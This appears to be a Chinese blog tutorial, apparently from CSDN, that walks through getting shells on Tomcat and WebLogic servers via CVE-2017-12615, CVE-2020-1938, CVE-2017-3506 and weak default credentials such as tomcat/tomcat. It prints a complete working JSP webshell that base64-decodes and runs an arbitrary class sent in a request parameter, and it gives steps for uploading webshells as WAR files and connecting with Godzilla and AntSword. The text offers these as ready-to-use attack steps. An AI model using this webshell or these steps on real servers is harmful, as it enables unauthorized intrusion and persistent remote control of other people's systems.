一、Tomcat
1.CVE-2017-12615
1.1打开tomcat页面
1.2 打开burp进行抓包,修改PUT方式,后面加上一句话木马
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
1.3上传木马后进入这个jsp页面,burp放行
1.4打开中国蚁剑测试连接
2.后台弱口令部署war包
2.1打开tomcat页面点击左边的manager app,输入弱口令tomcat/tomcat
2.2进入manager页面
2.3打开哥斯拉生成一个jsp木马,我们压缩成zip文件再修改后缀为war
2.4我们选择这个war文件点击deploy
2.5我们再打开这个jsp文件
2.6最后打开哥斯拉进行连接测试
3.CVE-2020-1938
3.1 先搭建好环境
3.2打开kali下载cve2020-1938
3.3右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip
二、Weblogic
1.后台弱口令getshell
1.1进入环境在地址栏后输入/console进入登录页面
1.2输入弱口令登录
1.3进入页面后点击部署点击安装
1.4点击上载文件
1.5上传一个jsp木马,先压缩为zip再修改格式为war
1.6进入后访问你植入的木马,没有报错证明注入成功
1.7打开哥斯拉测试连接
2.CVE-2017-3506
2.1打开工具进行漏洞检测
2.2点击命令执行查看whoami
2.3点击文件上传,把jsp木马复制进去点击上传
2.4查看下方出现木马上传成功,打开他给出的地址
2.5没有回显证明木马上传成功
2.6打开哥斯拉测试连接成功
标签:哥斯拉,常见,中间件,漏洞,点击,jsp,木马,打开,页面 From: https://blog.csdn.net/weixin_53198216/article/details/140948740